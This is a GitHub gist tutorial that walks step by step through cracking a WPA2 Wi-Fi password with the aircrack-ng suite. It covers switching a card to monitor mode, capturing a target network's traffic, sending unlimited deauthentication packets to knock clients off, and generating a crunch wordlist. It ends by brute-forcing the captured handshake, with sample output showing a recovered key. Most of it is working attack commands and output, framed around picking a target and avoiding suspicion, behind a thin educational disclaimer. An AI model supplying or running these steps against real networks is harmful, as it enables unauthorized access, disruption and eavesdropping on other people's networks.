Skip to content

Instantly share code, notes, and snippets.

@MahmoodJamshidian

MahmoodJamshidian/hack-wifi-with-aircrack-ng.md

Last active March 17, 2023 11:56
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MahmoodJamshidian/3e78e52343f64c41617e481bae63d25f to your computer and use it in GitHub Desktop.
Save MahmoodJamshidian/3e78e52343f64c41617e481bae63d25f to your computer and use it in GitHub Desktop.
Download ZIP
Hack WiFi with AirCrack-NG
Raw
hack-wifi-with-aircrack-ng.md

In this article, I am going to teach you how to hack Wi-Fi password using AirCrack-NG.

NOTE: The purpose of presenting this article is only for education and our goal is to improve the level of your network security knowledge. Any illegal use is the responsibility of the user and the author of this article does not accept any responsibility for illegal use.

Introduction:

In this tutorial, we will teach you how to get the password of a wireless network, our goal is only to secure our own wireless network and the organization we work in.

One of the most important things in securing wireless networks is its password. In all WiFi hacking tools and wireless networks, there is no way other than cracking the WiFi password. Therefore, in order to increase the security of our network, we must use strong and complex passwords. Of course, in hacking wireless networks, there is another way besides using hacking tools, you can also use social engineering, or even a combination of them! You will notice this in the final stages of cracking the Wi-Fi password.

After reading this article, you should be able to:

  • Analyze the wireless networks around you
  • Kick people from inside the wireless network
  • Dump data in transit (wireless eavesdropping)
  • Crack the password of a wireless network

Prerequisites:

  • A Linux operating system (Debian based, Kali Linux or Ubuntu or ...)
  • Wireless network card (monitoring mode support)
  • Internet access to install the necessary packages (in Kali Linux and Parrot OS, it is normally installed and does not require Internet access)
  • Little knowledge of Linux

In the first step, you need a Debian base Linux operating system, if you use Kali Linux and parrot os, you don't need to access the Internet. In order to analyze the networks around you, you need to have a network card that supports monitoring mode (I will explain later how to find out if our network card supports monitoring mode), and finally a little knowledge of Linux (just to better understand the commands)

NOTE: If you are using a virtual machine, the network card must be physically connected, for this, enter its settings and look for an option related to 'physical connection' in the section of your network card, if you do not find it You can search about it on Google

Start of work

NOTE: In all these steps, if you use the commands I put there and it doesn't work and you get an error, search the troubleshooting sites based on your operating system.

  • Package Installation

    NOTE: If you are using Kali Linux or Parrot OS, or if the necessary packages are already installed. There is no need to repeat this step

    NOTE: I am using Ubuntu 20.04 operating system. If the instructions for installing the packages do not work for you, you can search for the necessary instructions for your operating system on the Internet.

    Log in as the root user with the following command:

    $ sudo -i

    Install the aircrack-ng package:

    # apt update
# apt install -y aircrack-ng

    If you do not encounter an error in this step, you can go to the next step

  • Setting up the wireless network card

    Connect your wireless network card to the device (if it is not onboard)

    Then, see the information of the network cards by entering the iwconfig command:

    root@ubuntu:~# iwconfig
lo        no wireless extensions.

eno1      no wireless extensions.

wlp3s0    IEEE 802.11  Mode:Master  Tx-Power=15 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on

    Note that all network cards whose names start with w are wireless network cards (of course, except for virtual network cards which can be of any form)

    For example, I have a wireless network card named wlp3s0. Remember this name, we have a lot to do with it later.

    Currently, my network card is on Master mode (can be network card mode on other modes). In order to continue the work, we must put the network card on Monitor mode:

    # airmon-ng start [NETWORK-CARD-NAME]

    Replace [NETWORK-CARD-NAME] with the name of your network card

    After executing the above command, it is possible that the name of your network card will change, so get the name of your network card again with iwconfig command and remember it.

    NOTE: If after executing iwconfig command, you see that your network card mode is not set to Monitor, then your network card does not support Monitor mode.

  • Analyzing the surrounding networks and taking a dump from a handshake

    Use the following command to analyze nearby wireless networks:

    # airodump-ng [NETWORK-CARD-NAME]

    Output will look like this:

     CH  1 ][ Elapsed: 6 s ][ 2023-03-17 11:58 
 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 
 78:C3:E9:EB:AB:BE  -21       33        0    0  11   65   WPA2 CCMP   PSK  MJscript
 18:A6:F7:62:2C:67  -70       21        2    0   6  130   WPA2 CCMP   PSK  <length:  0>
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
 
 D8:47:32:86:33:E8  86:40:4C:FE:A1:CB  -55    0e- 0e     0      283
 18:A6:F7:62:2C:67  EA:AA:AC:9E:22:C1  -68    0 - 0e     2        4

    The first table shows the wireless networks and the second table shows the clients connected to them. We only need a few columns of the first table:

    • BSSID: MAC address of the wireless network
    • ESSID: The display name of the wireless network (if its value was <length: 0>, it means that it is hidden, when we take a dump from that network, its name will be recognized)
    • CH: Wireless network working channel The target of our attack is the MJScript wireless network. To better analyze this network, we need to do a more detailed search, so we enter the following command to do this:
    # airodump-ng -c [WIFI-CHANNEL] -d [WIFI-BSSID] -w [OUTPUT-PATH] [NETWORK-CARD-NAME]

    Replace [WIFI-CHANNEL] with the CH column value, [WIFI-BSSID] with the BSSID column value, and [OUTPUT-PATH] with the desired output path.

    For example, it went like this for me:

    root@ubuntu:~# airodump-ng -c 11 -d 78:C3:E9:EB:AB:BE -w /home/ubuntu/wifi wlp3s0mon
 CH 11 ][ Elapsed: 6 s ][ 2023-03-17 12:36 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 78:C3:E9:EB:AB:BE  -20 100       81       95   38  11   65   WPA2 CCMP   PSK  MJscript

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 78:C3:E9:EB:AB:BE  64:66:B3:1E:5B:A7  -38    0e-24   3123      106

    This is the same as the previous two tables, with the difference that it is only related to a wireless network and the data is dumped to the path we have given it.

    Currently, the data moving in this network is being recorded, but we cannot find the password of the target wireless network by any means, because the connection between them has already been established. So we have to wait for an authentic person who has the password to connect to it (we call the operation of connecting to the wireless network handshake), but this may take time, so we do it in another way. We can send a signal with our WiFi adapter that the client's credentials have been invalidated in the network and work to re-do the handshake.

    NOTE: The terminal contains the previous command to dump the handshake and should not be closed, only close the process when the handshake is done.

    Next, open a new terminal and enter the following commands there.

    We can use the following command to send the invalidation signal to all clients in the network:

    # aireplay-ng --deauth 0 -a [WIFI-BSSID] [NETWORK-CARD-NAME]

    In the above command, an unlimited number of credit invalidation signals will be sent to all clients in that network.

    But one question, isn't it suspicious that all clients in a network are suddenly disconnected? Well, we can work on only one of them, using the MAC address of the clients that is in the STATION column of the second table, with the following command, this operation will be done on only one of the clients:

    # aireplay-ng --deauth 0 -a [WIFI-BSSID] -c [CLIENT-STATION] [NETWORK-CARD-NAME]

    Replace [CLIENT-STATION] with the MAC address of the client.

    NOTE: The number zero means an unlimited number of signals, you can change it and specify any number you want.

    After sending the signal a few times, you can close its process.

    After a few seconds after closing the process of sending the signal, it will be changed in the first terminal in the first line as follows:

     CH 11 ][ Elapsed: 12 s ][ 2023-03-17 13:42 ][ WPA handshake: 78:C3:E9:EB:AB:BE

    You can see that WPA handshake: 78:C3:E9:EB:AB:BE value is added to the end of the line. It means that the handshake was done on the 78:C3:E9:EB:AB:BE network (which, of course, will show you the address of another network)

    Now the handshake we needed is there and you can close the network dump process.

  • Perform brute force on output files

    Before you brute force, you should have a file that contains passwords to test.

    In the introduction, I mentioned that you can do this hack with social engineering, but you may not be successful, so you can use the data you obtained to create a professional password list for that network. Multiply the probability of its password being cracked.

    If you don't have a password list and you want to have a password list of all keyboard characters, you can do it with the following command:

    NOTE: This tool may not be installed, so you can install this tool with apt install crunch command. ‍

    # crunch [MIN-SIZE] [MAX-SIZE] "[CHARACTERS]" > [OUTPUT-FILE]

    Replace [MIN-SIZE] with the minimum password size, [MAX-SIZE] with the maximum password size, [CHARACTERS] with the characters in the password, and [OUTPUT-FILE] with the file storage path.

    NOTE: Since the password of wireless networks cannot be less than 8 characters, so consider the [MIN-SIZE] value to be 8 or more.

    After creating the list password, you can crack the password with the following command:

    # aircrack-ng [CAP-FILE] -w [PASSLIST-FILE]

    Replace [CAP-FILE] with the cap extension file in the dump process output and [PASSLIST-FILE] with the address of the password list file.

    If the password is found, you will see the following output:

    root@ubuntu:~# aircrack-ng /home/ubuntu/wifi-01.cap -w /home/ubuntu/passlist
                               Aircrack-ng 1.6 

    [00:00:00] 2/2 keys tested (22.82 k/s) 

    Time left: --

                        KEY FOUND! [ 1234567890# ]


    Master Key     : B9 1B C6 AE 10 59 44 4A 4E CB EC D9 36 A3 79 86 
                     DE F8 EB CE 93 0B 22 D1 97 43 4F B5 FC C5 A5 B2 

    Transient Key  : AD 7D 3D 82 1A D2 CE 37 08 43 E9 4C 94 75 36 D7 
                     67 7D 48 A6 5F 70 77 CE 83 C9 63 BE C3 61 FC A7 
                     75 98 EB 09 B6 C1 B7 58 0F B6 0E 69 6F 81 60 5D 
                     29 FC 1C E6 35 B3 BF 77 2D 59 6C BF 50 6D 4A 85 

    EAPOL HMAC     : D4 BB C7 04 C7 C8 61 11 14 8B 3D 03 3B 04 28 E4

    After these long steps, we finally managed to get the Wi-Fi password.

  • Exit monitoring mode

    Enter the following command to exit the monitoring mode:

    # airmon-ng stop [NETWORK-CARD-NAME]

The End

Together we were able to hack a wireless network (Broadforce method) offline. My purpose of this training is only to raise your scientific level and I hope you will pay attention to my warnings and not cause trouble :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment